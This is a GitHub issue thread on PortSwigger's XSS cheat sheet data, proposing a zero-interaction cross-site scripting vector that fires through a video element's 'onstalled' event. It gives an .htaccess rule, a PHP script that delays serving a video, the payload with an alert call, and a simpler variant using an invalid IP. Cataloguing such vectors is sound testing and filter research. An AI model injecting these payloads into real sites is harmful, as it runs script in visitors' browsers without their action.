### ISSUE TITLE
Adding onstalled event XSS payload.

### ISSUE THREAD

**Issue by SMHTahsin33** [PortSwigger/xss-cheatsheet-data#67]
Hi, 

This one is interesting to me, not sure if anyone had any easier way to use this, would love to know. I think payload with `onstalled` event is not there. It requires no user interaction, but will popup after 2-3s.

Tested with : `Safari, Chrome, Brave, Mozilla`

**Prerequisites:**
1. A server hosting a valid video file.
2. Configure `.htaccess` file:
```
RewriteEngine On
RewriteRule ^video\.mp4$ /delay.php [L]
```
3. Create `delay.php` file:
```
<?php
// Introduce a delay of 5 seconds
sleep(5);

// Path to the actual video file
$file = '/var/www/html/video.mp4'; // Adjust the path if necessary

// Check if the file exists
if (file_exists($file)) {
    // Serve the video file
    header('Content-Type: video/mp4');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
} else {
    // File not found
    header("HTTP/1.0 404 Not Found");
    echo "File not found.";
    exit;
}
?>
```

**#Payload:**

`<video src="https://attacker.com/video.mp4" onstalled="alert(1337)">`

**Explanation:**
The .htaccess file will execute delay.php when video.mp4 is hit, it will cause the server a 5s delay. The payload will try to fetch the video which is a valid video, and while loading as it is stalled, it will execute the popup after 2-3s depending on the browser.

Warm Regards

**Comment by hackvertor** [comment]
Thanks this will be in the next release

**Comment by SMHTahsin33** [comment]
Hello @hackvertor, 

I found another problem free workaround on this, 

```
<video src="https://123.123.123" onstalled="alert(1337)">
```

There are some problems with this payload which occurs in `OSX` only. It must use `https://` and the invalid IP address must be of at least 3 dotted to make it work on OSX. 

In windows it also works with anything like `src="https://abc/"`

![image](https://github.com/user-attachments/assets/a16f7db9-9707-4d65-b015-8295fd824f26)

Thanks
